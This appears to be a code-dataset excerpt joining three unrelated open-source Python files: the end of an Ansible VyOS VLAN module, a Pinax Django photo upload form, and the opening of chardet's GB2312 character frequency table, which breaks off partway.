return commands
def map_params_to_obj(module):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
d = item.copy()
if not d['vlan_id']:
module.fail_json(msg='vlan_id is required')
d['vlan_id'] = str(d['vlan_id'])
module._check_required_one_of(module.required_one_of, item)
obj.append(d)
else:
obj.append({
'vlan_id': str(module.params['vlan_id']),
'name': module.params['name'],
'address': module.params['address'],
'state': module.params['state'],
'interfaces': module.params['interfaces'],
'associated_interfaces': module.params['associated_interfaces']
})
return obj
def map_config_to_obj(module):
objs = []
interfaces = list()
output = run_commands(module, 'show interfaces')
lines = output[0].strip().splitlines()[3:]
for l in lines:
splitted_line = re.split(r'\s{2,}', l.strip())
obj = {}
eth = splitted_line[0].strip("'")
if eth.startswith('eth'):
obj['interfaces'] = []
if '.' in eth:
interface = eth.split('.')[0]
obj['interfaces'].append(interface)
obj['vlan_id'] = eth.split('.')[-1]
else:
obj['interfaces'].append(eth)
obj['vlan_id'] = None
if splitted_line[1].strip("'") != '-':
obj['address'] = splitted_line[1].strip("'")
if len(splitted_line) > 3:
obj['name'] = splitted_line[3].strip("'")
obj['state'] = 'present'
objs.append(obj)
return objs
def check_declarative_intent_params(want, module, result):
have = None
obj_interface = list()
is_delay = False
for w in want:
if w.get('associated_interfaces') is None:
continue
if result['changed'] and not is_delay:
time.sleep(module.params['delay'])
is_delay = True
if have is None:
have = map_config_to_obj(module)
obj_in_have = search_obj_in_list(w['vlan_id'], have)
if obj_in_have:
for obj in obj_in_have:
obj_interface.extend(obj['interfaces'])
for w in want:
if w.get('associated_interfaces') is None:
continue
for i in w['associated_interfaces']:
if (set(obj_interface) - set(w['associated_interfaces'])) != set([]):
module.fail_json(msg='Interface {0} not configured on vlan {1}'.format(i, w['vlan_id']))
def main():
""" main entry point for module execution
"""
element_spec = dict(
vlan_id=dict(type='int'),
name=dict(),
address=dict(),
interfaces=dict(type='list'),
associated_interfaces=dict(type='list'),
delay=dict(default=10, type='int'),
state=dict(default='present',
choices=['present', 'absent'])
)
aggregate_spec = deepcopy(element_spec)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
purge=dict(default=False, type='bool')
)
argument_spec.update(element_spec)
argument_spec.update(vyos_argument_spec)
required_one_of = [['vlan_id', 'aggregate'],
['aggregate', 'interfaces', 'associated_interfaces']]
mutually_exclusive = [['vlan_id', 'aggregate']]
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
required_one_of=required_one_of,
mutually_exclusive=mutually_exclusive)
warnings = list()
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
check_declarative_intent_params(want, module, result)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
kevinr/750book-web | 750book-web-env/lib/python2.7/site-packages/pinax/apps/photos/forms.py | 2 | 1147 | from datetime import datetime
from django import forms
from django.utils.translation import ugettext_lazy as _
from pinax.apps.photos.models import Image
class PhotoUploadForm(forms.ModelForm):
class Meta:
model = Image
exclude = ["member", "photoset", "title_slug", "effect", "crop_from"]
def clean_image(self):
if "#" in self.cleaned_data["image"].name:
raise forms.ValidationError(
_("Image filename contains an invalid character: '#'. Please remove the character and try again."))
return self.cleaned_data["image"]
def __init__(self, user=None, *args, **kwargs):
self.user = user
super(PhotoUploadForm, self).__init__(*args, **kwargs)
class PhotoEditForm(forms.ModelForm):
class Meta:
model = Image
exclude = [
"member",
"photoset",
"title_slug",
"effect",
"crop_from",
"image",
]
def __init__(self, user=None, *args, **kwargs):
self.user = user
super(PhotoEditForm, self).__init__(*args, **kwargs)
| mit |
cubing/tnoodle | git-tools/requests/packages/chardet/gb2312freq.py | 3132 | 36011 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# GB2312 most frequently used character table
#
# Char to FreqOrder table , from hz6763
# 512 --> 0.79 -- 0.79
# 1024 --> 0.92 -- 0.13
# 2048 --> 0.98 -- 0.06
# 6768 --> 1.00 -- 0.02
#
# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79
# Random Distribution Ration = 512 / (3755 - 512) = 0.157
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR
GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9
GB2312_TABLE_SIZE = 3760
GB2312CharToFreqOrder = (
1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,
2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,
2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,
249,4088,1746,1873,2047,1774, 581,1813, 358,1174,3590,1014,1561,4844,2245, 670,
1636,3112, 889,1286, 953, 556,2327,3060,1290,3141, 613, 185,3477,1367, 850,3820,
1715,2428,2642,2303,2732,3041,2562,2648,3566,3946,1349, 388,3098,2091,1360,3585,
152,1687,1539, 738,1559, 59,1232,2925,2267,1388,1249,1741,1679,2960, 151,1566,
1125,1352,4271, 924,4296, 385,3166,4459, 310,1245,2850, 70,3285,2729,3534,3575,
2398,3298,3466,1960,2265, 217,3647, 864,1909,2084,4401,2773,1010,3269,5152, 853,
3051,3121,1244,4251,1895, 364,1499,1540,2313,1180,3655,2268, 562, 715,2417,3061,
544, 336,3768,2380,1752,4075, 950, 280,2425,4382, 183,2759,3272, 333,4297,2155,
1688,2356,1444,1039,4540, 736,1177,3349,2443,2368,2144,2225, 565, 196,1482,3406,
927,1335,4147, 692, 878,1311,1653,3911,3622,1378,4200,1840,2969,3149,2126,1816,
2534,1546,2393,2760, 737,2494, 13, 447, 245,2747, 38,2765,2129,2589,1079, 606,
360, 471,3755,2890, 404, 848, 699,1785,1236, 370,2221,1023,3746,2074,2026,2023,
2388,1581,2119, 812,1141,3091,2536,1519, 804,2053, 406,1596,1090, 784, 548,4414,
1806,2264,2936,1100, 343,4114,5096, 622,3358, 743,3668,1510,1626,5020,3567,2513,
3195,4115,5627,2489,2991, 24,2065,2697,1087,2719, 48,1634, 315, 68, 985,2052,
198,2239,1347,1107,1439, 597,2366,2172, 871,3307, 919,2487,2790,1867, 236,2570,
1413,3794, 906,3365,3381,1701,1982,1818,1524,2924,1205, 616,2586,2072,2004, 575,
253,3099, 32,1365,1182, 197,1714,2454,1201, 554,3388,3224,2748, 756,2587, 250,
2567,1507,1517,3529,1922,2761,2337,3416,1961,1677,2452,2238,3153, 615, 911,1506,
1474,2495,1265,1906,2749,3756,3280,2161, 898,2714,1759,3450,2243,2444, 563, 26,
3286,2266,3769,3344,2707,3677, 611,1402, 531,1028,2871,4548,1375, 261,2948, 835,
1190,4134, 353, 840,2684,1900,3082,1435,2109,1207,1674, 329,1872,2781,4055,2686,
2104, 608,3318,2423,2957,2768,1108,3739,3512,3271,3985,2203,1771,3520,1418,2054,
1681,1153, 225,1627,2929, 162,2050,2511,3687,1954, 124,1859,2431,1684,3032,2894,
585,4805,3969,2869,2704,2088,2032,2095,3656,2635,4362,2209, 256, 518,2042,2105,
3777,3657, 643,2298,1148,1779, 190, 989,3544, 414, 11,2135,2063,2979,1471, 403,
3678, 126, 770,1563, 671,2499,3216,2877, 600,1179, 307,2805,4937,1268,1297,2694,
252,4032,1448,1494,1331,1394, 127,2256, 222,1647,1035,1481,3056,1915,1048, 873,
3651, 210, 33,1608,2516, 200,1520, 415, 102, 0,3389,1287, 817, 91,3299,2940,
836,1814, 549,2197,1396,1669,2987,3582,2297,2848,4528,1070, 687, 20,1819, 121,
1552,1364,1461,1968,2617,3540,2824,2083, 177, 948,4938,2291, 110,4549,2066, 648,
3359,1755,2110,2114,4642,4845,1693,3937,3308,1257,1869,2123, 208,1804,3159,2992,
2531,2549,3361,2418,1350,2347,2800,2568,1291,2036,2680, 72, 842,1990, 212,1233,
1154,1586, 75,2027,3410,4900,1823,1337,2710,2676, 728,2810,1522,3026,4995, 157,
755,1050,4022, 710, 785,1936,2194,2085,1406,2777,2400, 150,1250,4049,1206, 807,
1910, 534, 529,3309,1721,1660, 274, 39,2827, 661,2670,1578, 925,3248,3815,1094,
4278,4901,4252, 41,1150,3747,2572,2227,4501,3658,4902,3813,3357,3617,2884,2258,
887, 538,4187,3199,1294,2439,3042,2329,2343,2497,1255, 107, 543,1527, 521,3478,
3568, 194,5062, 15, 961,3870,1241,1192,2664, 66,5215,3260,2111,1295,1127,2152,
3805,4135, 901,1164,1976, 398,1278, 530,1460, 748, 904,1054,1966,1426, 53,2909,
509, 523,2279,1534, 536,1019, 239,1685, 460,2353, 673,1065,2401,3600,4298,2272,
1272,2363, 284,1753,3679,4064,1695, 81, 815,2677,2757,2731,1386, 859, 500,4221,
2190,2566, 757,1006,2519,2068,1166,1455, 337,2654,3203,1863,1682,1914,3025,1252,
1409,1366, 847, 714,2834,2038,3209, 964,2970,1901, 885,2553,1078,1756,3049, 301,
1572,3326, 688,2130,1996,2429,1805,1648,2930,3421,2750,3652,3088, 262,1158,1254,
389,1641,1812, 526,1719, 923,2073,1073,1902, 468, 489,4625,1140, 857,2375,3070,
3319,2863, 380, 116,1328,2693,1161,2244, 273,1212,1884,2769,3011,1775,1142, 461,
3066,1200,2147,2212, 790, 702,2695,4222,1601,1058, 434,2338,5153,3640, 67,2360,
4099,2502, 618,3472,1329, 416,1132, 830,2782,1807,2653,3211,3510,1662, 192,2124,
296,3979,1739,1611,3684, 23, 118, 324, 446,1239,1225, 293,2520,3814,3795,2535,
3116, 17,1074, 467,2692,2201, 387,2922, 45,1326,3055,1645,3659,2817, 958, 243,
1903,2320,1339,2825,1784,3289, 356, 576, 865,2315,2381,3377,3916,1088,3122,1713,
1655, 935, 628,4689,1034,1327, 441, 800, 720, 894,1979,2183,1528,5289,2702,1071,
4046,3572,2399,1571,3281, 79, 761,1103, 327, 134, 758,1899,1371,1615, 879, 442,
215,2605,2579, 173,2048,2485,1057,2975,3317,1097,2253,3801,4263,1403,1650,2946,
814,4968,3487,1548,2644,1567,1285, 2, 295,2636, 97, 946,3576, 832, 141,4257,
3273, 760,3821,3521,3156,2607, 949,1024,1733,1516,1803,1920,2125,2283,2665,3180,
1501,2064,3560,2171,1592, 803,3518,1416, 732,3897,4258,1363,1362,2458, 119,1427,
602,1525,2608,1605,1639,3175, 694,3064, 10, 465, 76,2000,4846,4208, 444,3781,
1619,3353,2206,1273,3796, 740,2483, 320,1723,2377,3660,2619,1359,1137,1762,1724,
2345,2842,1850,1862, 912, 821,1866, 612,2625,1735,2573,3369,1093, 844, 89, 937,
930,1424,3564,2413,2972,1004,3046,3019,2011, 711,3171,1452,4178, 428, 801,1943,
432, 445,2811, 206,4136,1472, 730, 349, 73, 397,2802,2547, 998,1637,1167, 789,
396,3217, 154,1218, 716,1120,1780,2819,4826,1931,3334,3762,2139,1215,2627, 552,
3664,3628,3232,1405,2383,3111,1356,2652,3577,3320,3101,1703, 640,1045,1370,1246,
4996, 371,1575,2436,1621,2210, 984,4033,1734,2638, 16,4529, 663,2755,3255,1451,
3917,2257,1253,1955,2234,1263,2951, 214,1229, 617, 485, 359,1831,1969, 473,2310,
750,2058, 165, 80,2864,2419, 361,4344,2416,2479,1134, 796,3726,1266,2943, 860,
2715, 938, 390,2734,1313,1384, 248, 202, 877,1064,2854, 522,3907, 279,1602, 297,
2357, 395,3740, 137,2075, 944,4089,2584,1267,3802, 62,1533,2285, 178, 176, 780,
2440, 201,3707, 590, 478,1560,4354,2117,1075, 30, 74,4643,4004,1635,1441,2745,
776,2596, 238,1077,1692,1912,2844, 605, 499,1742,3947, 241,3053, 980,1749, 936,
2640,4511,2582, 515,1543,2162,5322,2892,2993, 890,2148,1924, 665,1827,3581,1032,
968,3163, 339,1044,1896, 270, 583,1791,1720,4367,1194,3488,3669, 43,2523,1657,
163,2167, 290,1209,1622,3378, 550, 634,2508,2510, 695,2634,2384,2512,1476,1414,
220,1469,2341,2138,2852,3183,2900,4939,2865,3502,1211,3680, 854,3227,1299,2976,
3172, 186,2998,1459, 443,1067,3251,1495, 321,1932,3054, 909, 753,1410,1828, 436,
2441,1119,1587,3164,2186,1258, 227, 231,1425,1890,3200,3942, 247, 959, 725,5254,
2741, 577,2158,2079, 929, 120, 174, 838,2813, 591,1115, 417,2024, 40,3240,1536,
1037, 291,4151,2354, 632,1298,2406,2500,3535,1825,1846,3451, 205,1171, 345,4238,
18,1163, 811, 685,2208,1217, 425,1312,1508,1175,4308,2552,1033, 587,1381,3059,
2984,3482, 340,1316,4023,3972, 792,3176, 519, 777,4690, 918, 933,4130,2981,3741,
90,3360,2911,2200,5184,4550, 609,3079,2030, 272,3379,2736, 363,3881,1130,1447,
286, 779, 357,1169,3350,3137,1630,1220,2687,2391, 747,1277,3688,2618,2682,2601,
1156,3196,5290,4034,3102,1689,3596,3128, 874, 219,2783, 798, 508,1843,2461, 269,
1658,1776,1392,1913,2983,3287,2866,2159,2372, 829,4076, 46,4253,2873,1889,1894,
915,1834,1631,2181,2318, 298, 664,2818,3555,2735, 954,3228,3117, 527,3511,2173,
681,2712,3033,2247,2346,3467,1652, 155,2164,3382, 113,1994, 450, 899, 494, 994,
1237,2958,1875,2336,1926,3727, 545,1577,1550, 633,3473, 204,1305,3072,2410,1956,
2471, 707,2134, 841,2195,2196,2663,3843,1026,4940, 990,3252,4997, 368,1092, 437,
3212,3258,1933,1829, 675,2977,2893, 412, 943,3723,4644,3294,3283,2230,2373,5154,
2389,2241,2661,2323,1404,2524, 593, 787, 677,3008,1275,2059, 438,2709,2609,2240,
2269,2246,1446, 36,1568,1373,3892,1574,2301,1456,3962, 693,2276,5216,2035,1143,
2720,1919,1797,1811,2763,4137,2597,1830,1699,1488,1198,2090, 424,1694, 312,3634,
3390,4179,3335,2252,1214, 561,1059,3243,2295,2561, 975,5155,2321,2751,3772, 472,
1537,3282,3398,1047,2077,2348,2878,1323,3340,3076, 690,2906, 51, 369, 170,3541,
1060,2187,2688,3670,2541,1083,1683, 928,3918, 459, 109,4427, 599,3744,4286, 143,
2101,2730,2490, 82,1588,3036,2121, 281,1860, 477,4035,1238,2812,3020,2716,3312,
1530,2188,2055,1317, 843, 636,1808,1173,3495, 649, 181,1002, 147,3641,1159,2414,
3750,2289,2795, 813,3123,2610,1136,4368, 5,3391,4541,2174, 420, 429,1728, 754,
1228,2115,2219, 347,2223,2733, 735,1518,3003,2355,3134,1764,3948,3329,1888,2424,
1001,1234,1972,3321,3363,1672,1021,1450,1584, 226, 765, 655,2526,3404,3244,2302,
3665, 731, 594,2184, 319,1576, 621, 658,2656,4299,2099,3864,1279,2071,2598,2739,
795,3086,3699,3908,1707,2352,2402,1382,3136,2475,1465,4847,3496,3865,1085,3004,
2591,1084, 213,2287,1963,3565,2250, 822, 793,4574,3187,1772,1789,3050, 595,1484,
1959,2770,1080,2650, 456, 422,2996, 940,3322,4328,4345,3092,2742, 965,2784, 739,
4124, 952,1358,2498,2949,2565, 332,2698,2378, 660,2260,2473,4194,3856,2919, 535,
1260,2651,1208,1428,1300,1949,1303,2942, 433,2455,2450,1251,1946, 614,1269, 641,
1306,1810,2737,3078,2912, 564,2365,1419,1415,1497,4460,2367,2185,1379,3005,1307,
3218,2175,1897,3063, 682,1157,4040,4005,1712,1160,1941,1399, 394, 402,2952,1573,
1151,2986,2404, 862, 299,2033,1489,3006, 346, 171,2886,3401,1726,2932, 168,2533,
47,2507,1030,3735,1145,3370,1395,1318,1579,3609,4560,2857,4116,1457,2529,1965,
504,1036,2690,2988,2405, 745,5871, 849,2397,2056,3081, 863,2359,3857,2096, 99,
1397,1769,2300,4428,1643,3455,1978,1757,3718,1440, 35,4879,3742,1296,4228,2280,
160,5063,1599,2013, 166, 520,3479,1646,3345,3012, 490,1937,1545,1264,2182,2505,
1096,1188,1369,1436,2421,1667,2792,2460,1270,2122, 727,3167,2143, 806,1706,1012,
1800,3037, 960,2218,1882, 805, 139,2456,1139,1521, 851,1052,3093,3089, 342,2039,
744,5097,1468,1502,1585,2087, 223, 939, 326,2140,2577, 892,2481,1623,4077, 982,
3708, 135,2131, 87,2503,3114,2326,1106, 876,1616, 547,2997,2831,2093,3441,4530,
4314, 9,3256,4229,4148, 659,1462,1986,1710,2046,2913,2231,4090,4880,5255,3392,
3274,1368,3689,4645,1477, 705,3384,3635,1068,1529,2941,1458,3782,1509, 100,1656,
2548, 718,2339, 408,1590,2780,3548,1838,4117,3719,1345,3530, 717,3442,2778,3220,
2898,1892,4590,3614,3371,2043,1998,1224,3483, 891, 635, 584,2559,3355, 733,1766,
1729,1172,3789,1891,2307, 781,2982,2271,1957,1580,5773,2633,2005,4195,3097,1535,
3213,1189,1934,5693,3262, 586,3118,1324,1598, 517,1564,2217,1868,1893,4445,3728,
2703,3139,1526,1787,1992,3882,2875,1549,1199,1056,2224,1904,2711,5098,4287, 338,
1993,3129,3489,2689,1809,2815,1997, 957,1855,3898,2550,3275,3057,1105,1319, 627,
1505,1911,1883,3526, 698,3629,3456,1833,1431, 746, 77,1261,2017,2296,1977,1885,
125,1334,1600, 525,1798,1109,2222,1470,1945, 559,2236,1186,3443,2476,1929,1411,
2411,3135,1777,3372,2621,1841,1613,3229, 668,1430,1839,2643,2916, 195,1989,2671,
2358,1387, 629,3205,2293,5256,4439, 123,1310, 888,1879,4300,3021,3605,1003,1162,
3192,2910,2010, 140,2395,2859, 55,1082,2012,2901, 662, 419,2081,1438, 680,2774,
4654,3912,1620,1731,1625,5035,4065,2328, 512,1344, 802,5443,2163,2311,2537, 524,
3399, 98,1155,2103,1918,2606,3925,2816,1393,2465,1504,3773,2177,3963,1478,4346,
180,1113,4655,3461,2028,1698, 833,2696,1235,1322,1594,4408,3623,3013,3225,2040,
3022, 541,2881, 607,3632,2029,1665,1219, 639,1385,1686,1099,2803,3231,1938,3188,
2858, 427, 676,2772,1168,2025, 454,3253,2486,3556, 230,1950, 580, 791,1991,1280,
1086,1974,2034, 630, 257,3338,2788,4903,1017, 86,4790, 966,2789,1995,1696,1131,
259,3095,4188,1308, 179,1463,5257, 289,4107,1248, 42,3413,1725,2288, 896,1947,
774,4474,4254, 604,3430,4264, 392,2514,2588, 452, 237,1408,3018, 988,4531,1970,
3034,3310, 540,2370,1562,1288,2990, 502,4765,1147, 4,1853,2708, 207, 294,2814,
4078,2902,2509, 684, 34,3105,3532,2551, 644, 709,2801,2344, 573,1727,3573,3557,
2021,1081,3100,4315,2100,3681, 199,2263,1837,2385, 146,3484,1195,2776,3949, 997,
1939,3973,1008,1091,1202,1962,1847,1149,4209,5444,1076, 493, 117,5400,2521, 972,
1490,2934,1796,4542,2374,1512,2933,2657, 413,2888,1135,2762,2314,2156,1355,2369,
766,2007,2527,2170,3124,2491,2593,2632,4757,2437, 234,3125,3591,1898,1750,1376,
1942,3468,3138, 570,2127,2145,3276,4131, 962, 132,1445,4196, 19, 941,3624,3480,
3366,1973,1374,4461,3431,2629, 283,2415,2275, 808,2887,3620,2112,2563,1353,3610,
955,1089,3103,1053, 96, 88,4097, 823,3808,1583, 399, 292,4091,3313, 421,1128,
642,4006, 903,2539,1877,2082, 596, 29,4066,1790, 722,2157, 130, 995,1569, 769,
1485, 464, 513,2213, 288,1923,1101,2453,4316, 133, 486,2445, 50, 625, 487,2207,
57, 423, 481,2962, 159,3729,1558, 491, 303, 482, 501, 240,2837, 112,3648,2392,
1783, 362, 8,3433,3422, 610,2793,3277,1390,1284,1654, 21,3823, 734, 367, 623,
193, 287, 374,1009,1483, 816, 476, 313,2255,2340,1262,2150,2899,1146,2581, 782,
2116,1659,2018,1880, 255,3586,3314,1110,2867,2137,2564, 986,2767,5185,2006, 650,
158, 926, 762, 881,3157,2717,2362,3587, 306,3690,3245,1542,3077,2427,1691,2478,
2118,2985,3490,2438, 539,2305, 983, 129,1754, 355,4201,2386, 827,2923, 104,1773,
2838,2771, 411,2905,3919, 376, 767, 122,1114, 828,2422,1817,3506, 266,3460,1007,
1609,4998, 945,2612,4429,2274, 726,1247,1964,2914,2199,2070,4002,4108, 657,3323,
1422, 579, 455,2764,4737,1222,2895,1670, 824,1223,1487,2525, 558, 861,3080, 598,
2659,2515,1967, 752,2583,2376,2214,4180, 977, 704,2464,4999,2622,4109,1210,2961,
819,1541, 142,2284, 44, 418, 457,1126,3730,4347,4626,1644,1876,3671,1864, 302,
1063,5694, 624, 723,1984,3745,1314,1676,2488,1610,1449,3558,3569,2166,2098, 409,
1011,2325,3704,2306, 818,1732,1383,1824,1844,3757, 999,2705,3497,1216,1423,2683,
2426,2954,2501,2726,2229,1475,2554,5064,1971,1794,1666,2014,1343, 783, 724, 191,
2434,1354,2220,5065,1763,2752,2472,4152, 131, 175,2885,3434, 92,1466,4920,2616,
3871,3872,3866, 128,1551,1632, 669,1854,3682,4691,4125,1230, 188,2973,3290,1302,
1213, 560,3266, 917, 763,3909,3249,1760, 868,1958, 764,1782,2097, 145,2277,3774,
4462, 64,1491,3062, 971,2132,3606,2442, 221,1226,1617, 218, 323,1185,3207,3147,
571, 619,1473,1005,1744,2281, 449,1887,2396,3685, 275, 375,3816,1743,3844,3731,
845,1983,2350,4210,1377, 773, 967,3499,3052,3743,2725,4007,1697,1022,3943,1464,
3264,2855,2722,1952,1029,2839,2467, 84,4383,2215, 820,1391,2015,2448,3672, 377,
1948,2168, 797,2545,3536,2578,2645, 94,2874,1678, 405,1259,3071, 771, 546,1315,
470,1243,3083, 895,2468, 981, 969,2037, 846,4181, 653,1276,2928, 14,2594, 557,
3007,2474, 156, 902,1338,1740,2574, 537,2518, 973,2282,2216,2433,1928, 138,2903,
1293,2631,1612, 646,3457, 839,2935, 111, 496,2191,2847, 589,3186, 149,3994,2060,
4031,2641,4067,3145,1870, 37,3597,2136,1025,2051,3009,3383,3549,1121,1016,3261,
1301, 251,2446,2599,2153, 872,3246, 637, 334,3705, 831, 884, 921,3065,3140,4092,
2198,1944, 246,2964, 108,2045,1152,1921,2308,1031, 203,3173,4170,1907,3890, 810,
1401,2003,1690, 506, 647,1242,2828,1761,1649,3208,2249,1589,3709,2931,5156,1708,
498, 666,2613, 834,3817,1231, 184,2851,1124, 883,3197,2261,3710,1765,1553,2658,
1178,2639,2351, 93,1193, 942,2538,2141,4402, 235,1821, 870,1591,2192,1709,1871,
3341,1618,4126,2595,2334, 603, 651, 69, 701, 268,2662,3411,2555,1380,1606, 503,
448, 254,2371,2646, 574,1187,2309,1770, 322,2235,1292,1801, 305, 566,1133, 229,
2067,2057, 706, 167, 483,2002,2672,3295,1820,3561,3067, 316, 378,2746,3452,1112,
136,1981, 507,1651,2917,1117, 285,4591, 182,2580,3522,1304, 335,3303,1835,2504,
1795,1792,2248, 674,1018,2106,2449,1857,2292,2845, 976,3047,1781,2600,2727,1389,
1281, 52,3152, 153, 265,3950, 672,3485,3951,4463, 430,1183, 365, 278,2169, 27,
1407,1336,2304, 209,1340,1730,2202,1852,2403,2883, 979,1737,1062, 631,2829,2542,
3876,2592, 825,2086,2226,3048,3625, 352,1417,3724, 542, 991, 431,1351,3938,1861,
2294, 826,1361,2927,3142,3503,1738, 463,2462,2723, 582,1916,1595,2808, 400,3845,
3891,2868,3621,2254, 58,2492,1123, 910,2160,2614,1372,1603,1196,1072,3385,1700,
3267,1980, 696, 480,2430, 920, 799,1570,2920,1951,2041,4047,2540,1321,4223,2469,
3562,2228,1271,2602, 401,2833,3351,2575,5157, 907,2312,1256, 410, 263,3507,1582,
996, 678,1849,2316,1480, 908,3545,2237, 703,2322, 667,1826,2849,1531,2604,2999,
2407,3146,2151,2630,1786,3711, 469,3542, 497,3899,2409, 858, 837,4446,3393,1274,
786, 620,1845,2001,3311, 484, 308,3367,1204,1815,3691,2332,1532,2557,1842,2020,
2724,1927,2333,4440, 567, 22,1673,2728,4475,1987,1858,1144,1597, 101,1832,3601,
12, 974,3783,4391, 951,1412, 1,3720, 453,4608,4041, 528,1041,1027,3230,2628,
1129, 875,1051,3291,1203,2262,1069,2860,2799,2149,2615,3278, 144,1758,3040, 31,
475,1680, 366,2685,3184, 311,1642,4008,2466,5036,1593,1493,2809, 216,1420,1668,
233, 304,2128,3284, 232,1429,1768,1040,2008,3407,2740,2967,2543, 242,2133, 778,
1565,2022,2620, 505,2189,2756,1098,2273, 372,1614, 708, 553,2846,2094,2278, 169,
3626,2835,4161, 228,2674,3165, 809,1454,1309, 466,1705,1095, 900,3423, 880,2667,
3751,5258,2317,3109,2571,4317,2766,1503,1342, 866,4447,1118, 63,2076, 314,1881,
1348,1061, 172, 978,3515,1747, 532, 511,3970, 6, 601, 905,2699,3300,1751, 276,
1467,3725,2668, 65,4239,2544,2779,2556,1604, 578,2451,1802, 992,2331,2624,1320,
3446, 713,1513,1013, 103,2786,2447,1661, 886,1702, 916, 654,3574,2031,1556, 751,
2178,2821,2179,1498,1538,2176, 271, 914,2251,2080,1325, 638,1953,2937,3877,2432,
2754, 95,3265,1716, 260,1227,4083, 775, 106,1357,3254, 426,1607, 555,2480, 772,
1985, 244,2546, 474, 495,1046,2611,1851,2061, 71,2089,1675,2590, 742,3758,2843,
3222,1433, 267,2180,2576,2826,2233,2092,3913,2435, 956,1745,3075, 856,2113,1116,
451, 3,1988,2896,1398, 993,2463,1878,2049,1341,2718,2721,2870,2108, 712,2904,
4363,2753,2324, 277,2872,2349,2649, 384, 987, 435, 691,3000, 922, 164,3939, 652,
1500,1184,4153,2482,3373,2165,4848,2335,3775,3508,3154,2806,2830,1554,2102,1664,
2530,1434,2408, 893,1547,2623,3447,2832,2242,2532,3169,2856,3223,2078, 49,3770,
3469, 462, 318, 656,2259,3250,3069, 679,1629,2758, 344,1138,1104,3120,1836,1283,
3115,2154,1437,4448, 934, 759,1999, 794,2862,1038, 533,2560,1722,2342, 855,2626,
1197,1663,4476,3127, 85,4240,2528, 25,1111,1181,3673, 407,3470,4561,2679,2713,
768,1925,2841,3986,1544,1165, 932, 373,1240,2146,1930,2673, 721,4766, 354,4333,
391,2963, 187, 61,3364,1442,1102, 330,1940,1767, 341,3809,4118, 393,2496,2062,
2211, 105, 331, 300, 439, 913,1332, 626, 379,3304,1557, 328, 689,3952, 309,1555,
931, 317,2517,3027, 325, 569, 686,2107,3084, 60,1042,1333,2794, 264,3177,4014,
1628, 258,3712, 7,4464,1176,1043,1778, 683, 114,1975, 78,1492, 383,1886, 510,
386, 645,5291,2891,2069,3305,4138,3867,2939,2603,2493,1935,1066,1848,3588,1015,
1282,1289,4609, 697,1453,3044,2666,3611,1856,2412, 54, 719,1330, 568,3778,2459,
1748, 788, 492, 551,1191,1000, 488,3394,3763, 282,1799, 348,2016,1523,3155,2390,
1049, 382,2019,1788,1170, 729,2968,3523, 897,3926,2785,2938,3292, 350,2319,3238,
1718,1717,2655,3453,3143,4465, 161,2889,2980,2009,1421, 56,1908,1640,2387,2232,
1917,1874,2477,4921, 148, 83,3438, 592,4245,2882,1822,1055, 741, 115,1496,1624,
381,1638,4592,1020, 516,3214, 458, 947,4575,1432, 211,1514,2926,1865,2142, 189,
852,1221,1400,1486, 882,2299,4036, 351, 28,1122, 700,6479,6480,6481,6482,6483, # last 512
#Everything below is of no interest for detection purpose
5508,6484,3900,3414,3974,4441,4024,3537,4037,5628,5099,3633,6485,3148,6486,3636,
5509,3257,5510,5973,5445,5872,4941,4403,3174,4627,5873,6276,2286,4230,5446,5874,
5122,6102,6103,4162,5447,5123,5323,4849,6277,3980,3851,5066,4246,5774,5067,6278,
3001,2807,5695,3346,5775,5974,5158,5448,6487,5975,5976,5776,3598,6279,5696,4806,
4211,4154,6280,6488,6489,6490,6281,4212,5037,3374,4171,6491,4562,4807,4722,4827,
5977,6104,4532,4079,5159,5324,5160,4404,3858,5359,5875,3975,4288,4610,3486,4512,
5325,3893,5360,6282,6283,5560,2522,4231,5978,5186,5449,2569,3878,6284,5401,3578,
4415,6285,4656,5124,5979,2506,4247,4449,3219,3417,4334,4969,4329,6492,4576,4828,
4172,4416,4829,5402,6286,3927,3852,5361,4369,4830,4477,4867,5876,4173,6493,6105,
4657,6287,6106,5877,5450,6494,4155,4868,5451,3700,5629,4384,6288,6289,5878,3189,
4881,6107,6290,6495,4513,6496,4692,4515,4723,5100,3356,6497,6291,3810,4080,5561,
3570,4430,5980,6498,4355,5697,6499,4724,6108,6109,3764,4050,5038,5879,4093,3226,
6292,5068,5217,4693,3342,5630,3504,4831,4377,4466,4309,5698,4431,5777,6293,5778,
4272,3706,6110,5326,3752,4676,5327,4273,5403,4767,5631,6500,5699,5880,3475,5039,
6294,5562,5125,4348,4301,4482,4068,5126,4593,5700,3380,3462,5981,5563,3824,5404,
4970,5511,3825,4738,6295,6501,5452,4516,6111,5881,5564,6502,6296,5982,6503,4213,
